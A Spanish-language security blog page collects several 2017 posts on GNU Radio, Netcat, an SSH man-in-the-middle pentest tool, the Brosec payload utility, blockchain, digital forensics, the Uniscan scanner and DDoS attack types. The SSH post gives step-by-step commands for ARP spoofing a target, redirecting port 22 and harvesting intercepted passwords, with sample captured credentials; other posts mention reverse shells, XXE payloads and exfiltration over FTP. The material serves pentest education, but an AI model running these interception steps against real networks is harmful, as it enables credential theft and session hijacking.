Blog sobre seguridad informática, privacidad, anonimato, hacking ético, programación y sistemas operativos en general.

martes, 23 de mayo de 2017

¿Que es GNU Radio?


Es un conjunto de herramientas de desarrollo de software libre y de código abierto que proporciona bloques de procesamiento de señales para implementar radios de software. Se puede utilizar con el hardware de RF externa bajo costo fácilmente disponible para crear radios definidos por software, o sin hardware en un entorno de simulación similar. Es ampliamente utilizado en el aficionado, entornos comerciales y académicos para apoyar tanto la investigación de comunicaciones inalámbricas y sistemas de radio del mundo real.

GNU Radio está disponible bajo la Licencia Pública General de GNU (GPL) versión 3 o posterior. Todo el código es propiedad de la Fundación para el Software Libre.

En resumen, una radio software es un sistema de radio que lleva a cabo el procesamiento de la señal requerida en el software en lugar de utilizar circuitos integrados dedicados en el hardware. La ventaja es que ya que el software puede ser fácilmente reemplazado en el sistema de radio, el mismo hardware se puede utilizar para crear muchos tipos de radios para muchos estándares de transmisión diferentes; por lo tanto, una radio software puede ser utilizado para una variedad de aplicaciones!

realiza todo el procesamiento de la señal. Se puede utilizar para escribir aplicaciones para recibir datos de flujos digitales o para enviar datos en corrientes digitales, que se transmite a continuación el uso de hardware. GNU Radio tiene filtros, códigos de canal, elementos de sincronización, ecualizadores, demoduladores, vocoders, decodificadores, y muchos otros elementos (en la jerga de GNU Radio, llamamos a estos elementos de bloques ) que se encuentran típicamente en sistemas de radio. Más importante aún, se incluye un método para conectar estos bloques y luego se administra la forma se hace pasar datos de un bloque a otro. Extendiendo GNU Radio también es bastante fácil; si encuentra un bloque específico que falta, puede crear de forma rápida y añadirlo.

Desde el software Radio GNU, sólo puede manejar datos digitales. Por lo general, las muestras de banda de base complejas son el tipo de datos de entrada para los receptores y el tipo de datos de salida para los transmisores. hardware analógico se utiliza para desplazar la señal a la frecuencia central deseada. Ese requisito de lado, cualquier tipo de datos se puede transmitir de un bloque a otro - ya sea bits, bytes, vectores, ráfagas o tipos de datos más complejos.

Aplicaciones de radio de GNU se escriben principalmente utilizando el lenguaje de programación Python, mientras que el, camino de procesamiento de señales de rendimiento crítico suministrado está implementado en C ++ utilizando el procesador extensiones Point, donde flotantes disponibles. Por lo tanto, el desarrollador es capaz de implementar en tiempo real, sistemas de radio de alto rendimiento en un entorno fácil de usar, rápido de desarrollo de aplicaciones.

Sin embargo, hay maneras de usar GNU Radio sin ser capaz de código. En primer lugar, está el compañero de GNU Radio , una interfaz gráfica de usuario similar a Simulink. Se le permite crear aplicaciones de procesamiento de señales mediante arrastrar y soltar. Además, GNU Radio viene con un conjunto de listas para el uso de herramientas y programas de utilidad . Estos sirven para gestionar las operaciones más básicas, tales como la grabación de señales de RF y la realización de análisis de espectro. Si esto ha despertado su interés, tal vez echar un vistazo a la guía del principiante a utilizar GNU Radio .

Si desea ampliar GNU Radio (es decir, añadir una nueva funcionalidad), sin embargo, entonces usted debe escribir código. Para la creación de aplicaciones que son demasiado complejos para el compañero de GNU Radio, Python es la forma más fácil de seguir. Para el código de rendimiento crítico, debe escribir código C ++.

GNU Radio está disponible bajo la Licencia Pública General de GNU (GPL) versión 3. Todo el código es propiedad de la Fundación para el Software Libre.

Netcat "poderosa herramienta de uso en el hacking"


En el campo del hacking la poderosa herramienta mas utilizada de uso por el ataque es conocido popularmente como “Netcat”, que es una función de las redes de computadoras para el análisis y la escritura en las conexiones de red mediante TCP o UDP.

Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat.

Netcat está diseñado para ser un back-end fiable que se puede utilizar directamente o fácilmente impulsado por otros programas y scripts. 

Al mismo tiempo, es una herramienta de depuración e investigación de la red rica en características; ya que puede crear casi cualquier tipo de conexión de su usuario podría necesitar y tiene una serie de capacidades incorporadas.

Garbing Banner, shell bind (puerta trasera), en el chat, carga y descarga de archivos, escaneo de puertos, golpeo de puertos,el reenvío de puertos y también mostrar contenido del archivo del servidor web HTTP. son algunos ejemplo que puedes realizar netcat.

Hay tantas opciones dentro netcat para mejorar su función y efecto cuando se  escriba nc -h  en el terminal. Antes de entrar en el interior de sus datos de trabajo debe conscientes de que aquí teníamos utilizar un sistema de dos atacante como a los otros como sistema de destino.


Golpeo de puertos: 
$ nc hostname puerto

Escaneo de puertos:
Netcat también puede escanear el puerto TPC y UDP por lo que puede ser su uso en el lugar de Nmap que nos dirá sobre el puerto de apertura y cierre de la IP específica

El siguiente comando muestra blanco de la radio IP y el puerto

-z: zero-I/0 modo  [utilizado para el escaneo]

-w: tiempo de espera para los conecta y lee neto final

-v: -v verboso

-1: modo de escucha, de Conexiones entrantes

-n: sólo numérico direcciones IP,

ejemplo:

$ nc -v -n -z -w 1 hostname 70-6500

Para instalar netcat en ArchLinux:

$ sudo pacma -S netcat


Más funciones de netcat:

Copiar imagen de disco duro de host A a host B

-----------------------
HostA // 192.168.1.1
------------------------
          sda
       NETWORK
          sdb
------------------------
HostB // 192.168.1.2
-------------------------
En el host B ejecutamos: # netcat -p 2222 -l |bzip2 -d | dd of=/dev/sdb

Y en el host B ejecutamos:

# bzip2 -c /dev/sda | netcat hostA 2222 o se puede usar la ip:
# bzip2 -c /dev/sda | netcat 192.168.1.1 2222


On hostA, enter:

# nc -l 2222 > /dev/sdb
On hostB, enter:
# nc hostA 2222< /dev/sda
O
# nc 192.168.1.1 2222< /dev/sda

Utilizando una segunda máquina (hostB), conéctese al proceso nc de escucha en 2222 (hostA), alimentándose con el archivo (/ dev / sda) que se va a transferir, Puede utilizar bzip2 de la siguiente manera.
On hostA, enter:
# nc -l 2222 | bzip2 -d > /dev/sdb
On hostB, enter:
# bzip2 -c /dev/sda | nc 192.168.1.1 2222

Creando un modelo cliente servidor.

Es relativamente simple crear un modelo cliente/servidor. Desde una terminal que será utilizada para iniciar un modelo de servidor, se ejecuta netcat con la opción -l (listen o escuchar) seguida de un número de puerto que esté desocupado. Esto hará que netcat se comporte como servidor escuchando peticiones en un puerto arbitrario. En el siguiente ejemplo se ejecuta netcat para que funcione como servidor escuchando peticiones en el puerto 22222.

$ netcat -l 22222



Para finalizar netcat es al mismo tiempo muy fácil y polivalente, es como tratar de explicar todo lo que puede hacer con su navaja suiza.

sábado, 20 de mayo de 2017

Herramienta Pruebas de Penetración SSH man-in-the-middle



Esta herramienta de pruebas de penetración permite que un auditor para interceptar las conexiones SSH. 


Un parche que se aplica al código fuente v7.5p1 OpenSSH hace que actuar como un proxy entre la víctima y su servidor SSH que está destinado; todas las contraseñas en texto plano y las sesiones se graban en el disco. 

Por supuesto, el cliente SSH de la víctima se quejan de que la clave del servidor ha cambiado. Pero debido a 99,99999% de las veces esto es causado por una acción legítima (OS re-instalar, cambio de configuración, etc.), muchos / la mayoría de usuarios no tendrá en cuenta la advertencia y continuar. 

NOTA: Sólo ejecutar el sshd modificado en una máquina virtual o un contenedor! Ediciones ad-hoc se realizaron a las fuentes de OpenSSH en regiones críticas, sin tener en cuenta sus consecuencias para la seguridad. No es difícil imaginar que estas modificaciones introducen vulnerabilidades graves. Hasta que se elimine la dependencia de los privilegios de root, asegúrese sólo para ejecutar este código en MVS / envases de usar y tirar.

Que hacer

Esta es la primera versión de esta herramienta. Si bien es muy útil como está, sin embargo hay cosas que mejorar:

SFTP MITM'ing.
Añadir soporte de reenvío de puertos.
Retire la dependencia de los privilegios de root.
Crea un script que detecta cuando el usuario está tratando de utilizar la autenticación de clave única, y de-spoof de forma automática.

Configuración inicial: 

1.) Instalar zlib y openssl headers:

sudo apt install zlib1g-dev libssl-dev

2.) Descargar OpenSSH v7.5p1 y verifcar su firma:

wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Descomprime el código, parchear las fuentes, y compilarlo:

tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10

4.) Crear claves y el entorno de configuración:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Corremos el ataque: 

1.) Correr sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config

2.) Habilitar el reenvío IP:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT

3.) Permitir conexiones a sshd y modificar el trazado remitido conexiones SSH:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22

4.) ARP spoof un objetivo (s) (Protip: no suplantar todas las cosas que su interfaz de red débil probablemente no será capaz de manejar el tráfico de toda una red de una sola vez suplantar Sólo un par de direcciones IP a la vez) arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Una vez que se establece una sesión, un registro completo de toda la entrada y salida se pueden encontrar en /home/bogus/session_*.txt.

Muestra de resultados: 

Tras el éxito, /var/log/auth.log tendrá que registran las líneas de la contraseña, asi:

May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Por otra parte, toda la sesión SSH de la víctima se encuentra en  /home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Utilice el sendbug (1) utilidad para informar de los errores en el sistema. 
Antes de informar de un error, intenta reproducirla con la última versión del código. Con los informes de error, intenta garantizar que la información suficiente para reproducir el problema está encerrado, y si una solución conocida para ella existe, que incluirá también.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox's password: ROFLC0PTER!!1juan

Nota que los personajes de los comando del usuario aparecen dos veces en el archivo debido a que la entrada del usuario se registra , así como la salida de la shell (que se hace eco de caracteres espalda). Observe que cuando programas como sudo ssh y desactivar temporalmente haciendo eco con el fin de leer una contraseña, los caracteres duplicados no se registran.

Para mayor información y descarga consulten: https://github.com/jtesta/ssh-mitm

sábado, 13 de mayo de 2017

Brosec - Una herramienta de consulta interactiva para ayudar a los profesionales de seguridad utilizan cargas útiles y comando útiles


BroSec es utilidad de referencia basada en el terminal diseñado para ayudarnos con cargas útiles y comando útiles (aunque a veces complejas) que se utilizan a menudo durante el trabajo como profesionales infosec.

Un ejemplo de uno de los casos de uso más populares de BroSec es la capacidad de generar en las conchas mosca inversa (Python, Perl, powershell, etc) que son copiadas en el portapapeles.
Suponiendo que el usuario ya ha establecido las variables requeridas (leyendo para aprender cómo) un reverse shell usando el comando awk se puede generar tan fácil como ...



Las variables de carga útil

BroSec le permite almacenar y recuperar valores (en una base de datos JSON local) para varias variables con el fin de hacer que la generación de comando / carga útil más fácil. Mientras que algunas cargas útiles que ya se incluyen estas variables, también se pueden incluir en cualquier carga útil que solicita la entrada del usuario.
Por ejemplo, los siguientes se muestra cómo una descarga cuna Powershell se pueden generar utilizando las variables LHOST y Lport (los valores de los cuales ya se habían establecido).



Las variables disponibles

LHOST: Local IP o nombre
Lport: Local IP o nombre
Rhost: Remote IP o nombre
RPORT: Remote IP o nombre
USUARIO: Nombre de usuario (sólo se utiliza en pocas cargas útiles)
Solicitar al usuario (Esto no es un valor almacenado En cambio, las cargas útiles con esta variable se solicitan datos..)



Por encima de múltiples ejemplos de cómo acceder y establecer las variables de configuración almacenados.
Las variables de configuración se pueden ver a través del  config comando en cualquier momento, o introduciendo el nombre de la variable
Las variables pueden ser modificadas en cualquier momento introduciendo set <variable> <value>
También puede navegar a las cargas útiles de uso frecuente mediante la introducción de la secuencia de menú desde la línea de comandos: bros <sequence>
Ej:  bros 413 - Esto automatizar el valor 4 para el menú de red, 1 para el submenú XXE, y 3 para la carga de archivos local XXE. 

Características adicionales y ejemplos de uso
XXE para Bros


Además de las cargas útiles, tales como conchas inversa, Brosec también tiene múltiples cargas XXE que puede generar sobre la marcha.

HTTP sencilla (s) del servidor

¿Necesita un servidor web rápida? Olvidar python SimpleHTTPServer, bros tiene su parte posterior con  bros http cuando se introduce a través de la línea de comandos. Un servidor SSL? 


Servidor anonimo FTP

Necesidad de filtrarse algunos datos a través de FTP? Bros viene con un práctico  bros ftp cuando se introduce a través de la línea de comando. El servidor FTP anónimo acepta descargas/subidas vía current working directory  CWD (así que ten cuidado cuando se ejecuta).

Instalación para:

Mac
brew install node netcat - Instalar y nodejs netcat (nc o NCAT trabajará también)
git clone https://github.com/gabemarshall/Brosec.git - repo Clon Brosec
cd Brosec && npm install - CD en el directorio e instalar depdendencies NGP

Kali Linux
apt-get install npm build-essential g++ xsel netcat instalar las dependencias
npm config set registry http://registry.npmjs.org/ Registro NGP parece no estar funcionando de forma predeterminada cuando se instala desde repos Kali
npm install -g n latest n (nodejs administrador de versiones)
n latest Instale la última versión de nodejs
git clone https://github.com/gabemarshall/Brosec.git - repo Clon Brosec
npm install -g Brosec - Install Brosec (may need sudo to symlink to /usr/local/bin)

Configuración

Los valores de configuración Brosec almacena en un archivo JSON db local. La ubicación de almacenamiento predeterminada es /var/tmp, pero se puede cambiar modificando la variable settings.dbPath en el archivo settings.js. Brosec también utiliza netcat para varias cargas útiles. Si es necesario, el camino a netcat puede ser alterado mediante la variable settings.netcat (que también se puede cambiar a NCAT o NC).

Para mayor información consultar:  https://github.com/gabemarshall/Brosec

La tecnología Blockchain su rápido crecimiento en todas las industrias


La tecnología Blockchain es un nuevo concepto de entender, y su rápido crecimiento en todas las industrias. En la tecnología futura moneda virtual es la siguiente etapa de la evolución del dinero.

Las palabras bloquean y la cadena se utilizaron por separado en el documento original de Satoshi Nakamoto en octubre de 2008, y cuando el término entró en amplio uso que fue originalmente bloque de la cadena, antes de convertirse en una sola palabra, blockchain, en 2016. En agosto de 2014, el archivo blockchain bitcoin tamaño llegó a 20 gigabytes de tamaño.

La tecnología Blockchain ya ha colocado en pocos países. Financiación y registro en el departamento de transporte en Australia. departamento de bienes raíces está creciendo rápidamente mediante el uso de tecnología BlockChain en Dubai. Considerando que los pagos bancarios internos utilizando BlockChain Tecnología en Singapur.

Bitcoin:

Bitcoin utiliza la tecnología peer-to-peer para operar sin una autoridad central o bancos; la gestión de las transacciones y la expedición de bitcoins se lleva a cabo colectivamente por la red. Bitcoin es de código abierto; su diseño es público, nadie posee o controla Bitcoin y todo el mundo puede participar. A través de muchas de sus propiedades únicas, Bitcoin permite usos interesantes que no podían ser cubiertos por ningún sistema de pago previo.

Bitcoin es una criptomoneda y un sistema de pago inventado por un programador no identificado, o un grupo de programadores, bajo el nombre de Satoshi Nakamoto. Bitcoin fue presentado el 31 de octubre de 2008 a una lista de correo de la criptografía, y publicado como software de código abierto en el año 2009. Actualmente, los bancos, tarjetas de crédito están cobrando 7-10% de tasa promedio de transacción. Pero este es el benfit con usuarios de Bitcoin obtener el pago directo de cualquier persona y en cualquier lugar del mundo.



Como sabemos acerca de Bitcoin es una moneda virtual y que pronto incluye la transferencia de la propiedad y la gestión de identidad. Los sectores público y privado se enfrentarán a nuevos retos, oportunidades y responsabilidades. sector gubernamental es también cooperador con la tecnología Bitcoin para crear productos y servicios innovadores.

La gestión de identidad es también el TRANFORM en la tecnología Blockchain. Como se sabe, hay muchas identidades y documentos fueron robados en los últimos años.

formas de gestión de identidad:

pasaportes
números de seguridad social
Licencia de conducir
Número de identificación fiscal y más ..
De acuerdo con Forbes

El Blockchain es un libro de contabilidad pública que registra (que proporciona la propiedad y hora) y valida todas las transacciones realizadas en todo el mundo.
Lo que hace a esta red única y segura es que todas las transacciones están autorizados y respaldados por miles de computadoras (llamados mineros), el logro de un consenso sobre cada transacción.
Nadie es dueño de ella (de ahí el término “descentralizado”), y por lo tanto es inmutable y no hay ningún punto de ataque para los que tratan de “cortar” o de otra manera alterar los registros en el registro Blockchain.
La tecnología permite de igual a igual capacidad (P2P) transacción sin la intervención de una autoridad central o de un tercero.
¿Cómo funciona?

A continuación se muestra la gráfica de los casos.


¿Que es el análisis forense informático?


El análisis forense digital se corresponde con un conjunto de técnicas destinadas a extraer información valiosa de discos, sin alterar el estado de los mismos. Esto permite buscar datos que son conocidos previamente, tratando de encontrar un patrón o comportamiento determinado, o descubrir información que se encontraba oculta. 

La Informática Forense surge como una disciplina auxiliar de la justicia moderna, para contrarrestar los desafíos y técnicas de los delincuentes informáticos; garante de la verdad circundante de la evidencia de carácter digital, que es mucho más susceptible de sufrir alteración y/o modificaciones por la connotación que de acuerdo a la practicidad y cotidianidad se le asigna, pero que eventualmente se pudiese aportar como medio de prueba en un proceso judicial.

Dentro del proceso de investigación criminal, la Informática Forense permite realizar experticias específicas sobre: telefonía celular, sistemas de seguridad de circuito cerrado, equipos de computación, dispositivos de almacenamiento (discos duros, dispositivos flash, cd o diskettes), páginas web, correos electrónicos, entre otros.

Forense en redes (network forensics)

Es un escenario aún más complejo, pues es necesario comprender la manera como los protocolos, configuraciones e infraestructuras de comunicaciones se conjugan para dar como resultado un momento específico en el tiempo y un comportamiento particular. Esta conjunción de palabras establece un profesional que entendiendo las operaciones de las redes de computadores, es capaz, siguiendo los protocolos y formación criminalística, de establecer los rastros, los movimientos y acciones que un intruso ha desarrollado para concluir su acción. A diferencia de la definición de computación forense, este contexto exige capacidad de correlación de evento, muchas veces disyuntos y aleatorios, que en equipos particulares, es poco frecuente.

Objetivos de la Informática Forense

La informática forense tiene 3 objetivos, a saber:
  1. La compensación de los daños causados por los criminales o intrusos.
  2. La persecución y procesamiento judicial de los criminales. 
  3. La creación y aplicación de medidas para prevenir casos similares. Estos objetivos son logrados de varias formas, entre ellas, la principal es la recolección de evidencia. 
Muchas personas creen que un Análisis Forense consta simplemente de la utilización de herramientas el desarrollo de la investigación, pero no es así. Los Pasos clave para una investigación Forense:

1- Identificar el crimen cibernético.

2- Recolectar evidencia preliminar.

3- Obtener una orden judicial para un allanamiento  (Si es requerido).

4- Incautar las pruebas de la escena del crimen.
Es importante realizar el reconocimiento técnico a cada evidencia, digital y/o física,el cual permite hacer una descripción detallada del material recibido, individualizando sus características físicas particulares, como marca, modelo, serial y otras que permitan particularizar la pieza en estudio.

5- Trasladar la evidencia a un laboratorio forense.

6- Crear copias bit a bit de la evidencia

7- Generar un valor de comprobación de la imagen, ejemplo un Hash MD5

8- Almacenar la información o evidencia original en una locación segura.

9- Analizar la copia de la imagen en búsqueda de evidencia.

11- Preparar un reporte forense.

12- Enviar el reporte al cliente.

13- Si es requerido, acudir a una corte como testigo experto.

Una investigación forense va más allá de la utilización de medios informáticos, de deben conocer procesos legales, administrativos y claro, informáticos, debemos conocer todo esto con la finalidad de evitar mermar la investigación y terminar nosotros demandados.

Instalar Uniscan en ArchLinux


Uniscan es un escáner de vulnerabilidades Web, dirigido a la seguridad informática, cuyo objetivo es la búsqueda de vulnerabilidades en los sistemas web. Está licenciado bajo GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

Uniscan está desarrollado en Perl, tiene un fácil manejo de expresiones regulares y también es multi-threaded.

Vamos a empezar !!!

Abra el terminal y escriba siguiente comando usando:

$ sudo pacman -S uniscan  


Si te da este error al momento de usar uniscan:


Usamos este comando:

$ cpan -i Moose 


Otro error si llega a ocurrir:

Este error lo podemos resolver usando este comando: sudo cpan install Net::SSLeay  
También debemos editar el archivo con su editor /usr/share/uniscan/uniscan.pl la linea "./Uniscan" por: use lib "./" solo es temporal hasta que los desarrolladores de BlackArch lo reparen. Nota: cada vez que ocurre este error se debe modifica.

Este archivo debe modificarse cada vez que actualiza uniscan 
Guardamos y cerramos.
 
Siguiente comando usando la opción -j para las huellas dactilares de servidor ejemplo: 

$ sudo uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -j


Para entrar al menú de opciones: 

$ sudo uniscan -h


viernes, 5 de mayo de 2017

Tipos de ataques DDoS


Ataques de denegación de servicio (DDoS) puede cerrar sus sitios web y red. Tenemos una lista de los diferentes tipos de ataques DDoS, y disponen de recursos para detener los ataques DDoS.

Ataques de denegación de servicio (DDoS) son un método de ataque favorito de los hackers y hacktivistas, en gran parte debido a su simplicidad. Tenemos una lista de los diferentes tipos de ataques DDoS, y disponen de recursos para detener los ataques DDoS.

¿Qué es un ataque DDoS?

Entonces, ¿qué es un ataque DDoS? Es cuando los atacantes informáticos son capaces de inundar una dirección IP con cientos o miles de mensajes, a menudo mediante el uso de redes de bots o por medio de un esfuerzo hacktivista coordinada, teniendo la red hasta el punto en el que los usuarios legítimos no son capaces de conseguir a través la negación de servicio.

Los ataques DDoS son también rentables , mientras que ser asequible, lo que lleva a más gente para tomar ventaja de este tipo de ataque, Tim Pat Dufficy, director general de ServerSpace, dijo eSecurity planeta : “La barrera a la entrada de los ataques DDoS en términos de coste ha pasado en gran medida. Eso significa que cualquier persona puede lanzar un ataque: el crimen organizado, un grupo de chantajistas, o simplemente un ex empleado descontento o un competidor. Y cualquiera puede ser víctima. Uno de nuestros clientes es una pequeña empresa que hace el entrenamiento de la gente en el negocio de la construcción, sin embargo, fueron atacados por dos semanas “.

Mientras DDoS ofrecen un modo de ataque menos complicado que otras formas de ataques cibernéticos, que están creciendo más fuerte y más sofisticados. Hay tres categorías básicas de ataque:

  • Ataques basados en el volumen , que utilizan un alto tráfico para inundar el ancho de banda de la red;
  • Ataques de protocolo, que se centran en la explotación de los recursos del servidor; y
  • Ataques a las aplicaciones que se centran en aplicaciones web y se consideran el tipo más sofisticado y grave de los ataques.
  • Los diferentes tipos de ataques se dividen en categorías en función de la cantidad de tráfico y las vulnerabilidades en la mira.

Diagrama de un ataque DDoS usando el software Stacheldraht.


Los ataques DDoS comunes. Aquí está una lista de los tipos más populares de los ataques DDoS:


SYN Flood

SYN Flood explota las debilidades en la secuencia de conexión TCP, conocido como un apretón de manos de tres vías. La máquina host recibe un mensaje sincronizado (SYN) para comenzar el “apretón de manos”. El servidor reconoce el mensaje mediante el envío de una bandera de acuse de recibo (ACK) al host inicial, que luego se cierra la conexión. En una inundación SYN, sin embargo, se envían mensajes falsificados y la conexión no se cierra, el cierre de servicio.

Inundación UDP

El User Datagram Protocol (UDP) es un protocolo de red sin sesión. A los objetivos de inundación UDP puertos al azar en una computadora o red con paquetes UDP. Las comprobaciones de los equipos para la aplicación escuchando en esos puertos, pero no se encuentra ninguna aplicación.

HTTP Flood

HTTP inundación parece ser legítimas peticiones GET o POST que son explotados por un hacker. Se utiliza menos ancho de banda que otros tipos de ataques, pero puede forzar al servidor para utilizar el máximo de recursos.

Ping de la Muerte

Ping de la Muerte manipula protocolos IP mediante el envío de pings maliciosos a un sistema. Este era un tipo popular de DDoS hace dos décadas, pero es menos eficaz en la actualidad.

Ataque Smurf

Un Ataque Smurf explota Protocolo de Internet (IP) y el Protocolo de mensajes de control de Internet (ICMP) usando un programa de malware llamado pitufo. Se falsifica una dirección IP y el uso de ICMP, hace ping direcciones IP en una red dada.

Ataque fraggle

Un ataque Fraggle utiliza grandes cantidades de tráfico UDP a la red de difusión de un router. Es similar a un ataque Smurf, utilizando UDP en lugar de ICMP.

Loris lento

Slowloris permite a los atacantes utilizan un mínimo de recursos durante un ataque y objetivos en el servidor web. Una vez que se ha conectado con su objetivo deseado, Slowloris la mantiene abierta durante el mayor tiempo posible con las inundaciones HTTP. Este tipo de ataque se ha utilizado en algunos de alto perfil DDoSing hacktivista, incluyendo la elección presidencial iraní de 2009. Con este tipo de ataque es muy difícil la mitigación de DDoS.

Los ataques a nivel de aplicación

Los ataques a nivel de aplicación aprovechan las vulnerabilidades de las aplicaciones. El objetivo de este tipo de ataque no es para ir después de todo el servidor, pero las aplicaciones con debilidades conocidas.

NTP amplificación

NTP amplificación explota Network Time Protocol (NTP), servidores de un protocolo de red de largo plazo se utiliza para sincronizar relojes de los equipos, con el fin de saturar el tráfico UDP. Este es un ataque reflejo amplificado. En cualquier ataque reflexión, hay una respuesta del servidor a una dirección IP falsificadas. Una versión amplificada significa la respuesta del servidor es desproporcionada a la solicitud original. Debido al alto ancho de banda utilizado cuando DDoSed, este tipo de ataque puede ser devastador y alto volumen.

Avanzada Persistente DoS (APDoS)

Avanzada Persistente DoS (APDoS) es un tipo de ataque utilizado por los hackers que quieren causar daños graves. Se utiliza una variedad de los estilos de los ataques mencionados anteriormente (inundaciones HTTP, inundaciones SYN, etc.) y regularmente se dirige a múltiples vectores de ataque que envían millones de solicitudes por segundo. APDoS ataques pueden durar semanas, en gran parte debido a la capacidad del hacker para cambiar de táctica en cualquier momento y para crear desvíos para eludir las defensas de seguridad.

Día cero ataques DDoS

Día cero ataque DDoS es el nombre dado a los nuevos métodos de ataque DDoS que aprovechan las vulnerabilidades que aún no han sido parcheados.

Ejemplos de ataque DDoS:
En el otoño de 2016, el malware Mirai Internet de los dispositivos de objetos (IO) infectado, convirtiéndolas en redes de bots que crearon los ataques DDoS en el experto en seguridad Brian Krebs, proveedor de soluciones de DNS Dyn, y el acceso a Internet a través de Liberia .

En marzo de 2013, CloudFlare, anfitriona de la lucha contra el correo no deseado SpamHaus.org, sufrió lo que entonces era el mayor ataque DDoS en la historia , pero fue mitigado con la suficiente rapidez que nunca se llevó a SpamHaus.org fuera de línea.

Del Reino Unido los servicios de banca por Internet de HSBC no estaban disponibles durante varias horas en enero de 2016. Sucedió en lo que era el día de pago para muchos de los clientes de HSBC. El ataque se mitigó rápidamente y el corte no dio lugar a ningún tipo de compromiso de los registros de clientes.

La campaña de malware Dyre Lobo utiliza una combinación de malware y ataques DDoS para ir después de las cuentas bancarias. El software malicioso se suministra a través del uso de tácticas sofisticadas de ingeniería social. El ataque DDoS se utilizó para causar una distracción para la transferencia electrónica de fondos robados pasaría desapercibida hasta que fue demasiado tarde.

Mas adelante le enseñaremos como se realiza los diferentes tipos de  ataques y también a Mitigarlos. 

Fuente: Sue Marquette Poremba